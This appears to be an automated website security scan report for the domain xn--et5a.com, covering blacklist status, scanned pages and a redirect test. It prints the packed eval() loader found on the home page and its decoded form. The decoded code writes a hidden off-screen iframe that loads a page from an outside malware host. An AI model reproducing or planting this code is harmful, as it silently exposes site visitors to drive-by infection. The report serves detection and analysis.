Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xn--et5a.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xn--et5a.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xn--et5a.com/ | 200 OK Content-Length: 13802 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i& Decoded script: function hDcd(data){var b16_digits='0123456789abcdef';var b16_map=new Array();for(var i=0;i<256;i++){b16_map[b16_digits.charAt(i>>4)+b16_digits.charAt(i&15)]=String.fromCharCode(i)}if(!data.match(/^[a-f0-9]*$/i))return false;if(data.length%2)data='0'+data;var ll=data.length;var result=new Array();var j=0;for(var i=0;i<ll;i+=2){result[j++]=b16_map[data.substr(i,2)]}return result.join('')}if(document.cookie.indexOf('cookien=enabled')==-1){document.write(hDcd('3c646976207374796 <div style="position: absolute; left: -1993px; top: -2991px;"><iframe width="20" height="30" src="http://csshosthttph.ignorelist.com/i.php?go=1"></iframe></div> Antivirus reports:
| ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://xn--et5a.com/1.htm | 200 OK Content-Length: 13779 Content-Type: text/html | clean |
http://xn--et5a.com/2.htm | 200 OK Content-Length: 13234 Content-Type: text/html | clean |
http://xn--et5a.com/3.htm | 200 OK Content-Length: 13179 Content-Type: text/html | clean |
http://xn--et5a.com/4.htm | 200 OK Content-Length: 12976 Content-Type: text/html | clean |
http://xn--et5a.com/5.htm | 200 OK Content-Length: 12703 Content-Type: text/html | clean |
http://xn--et5a.com/6.htm | 200 OK Content-Length: 13862 Content-Type: text/html | clean |
http://xn--et5a.com/7.htm | 200 OK Content-Length: 13045 Content-Type: text/html | clean |
http://xn--et5a.com/8.htm | 200 OK Content-Length: 15590 Content-Type: text/html | clean |
http://xn--et5a.com/9.htm | 200 OK Content-Length: 13040 Content-Type: text/html | clean |
http://xn--et5a.com/10.htm | 200 OK Content-Length: 12747 Content-Type: text/html | clean |
http://xn--et5a.com/11.htm | 200 OK Content-Length: 14760 Content-Type: text/html | clean |
http://xn--et5a.com/12.htm | 200 OK Content-Length: 12709 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xn--et5a.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 17:00:30 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 13802
Content-Type: text/html
Last-Modified: Thu, 16 Aug 2007 21:05:48 GMT
...13802 bytes of data.
GET / HTTP/1.1
Host: xn--et5a.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 17:00:30 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 13802
Content-Type: text/html
Last-Modified: Thu, 16 Aug 2007 21:05:48 GMT
...13802 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xn--et5a.com
Referer: http://www.google.com/search?q=xn--et5a.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xn--et5a.com
Referer: http://www.google.com/search?q=xn--et5a.com
Result:
The result is similar to the first query. There are no suspicious redirects found.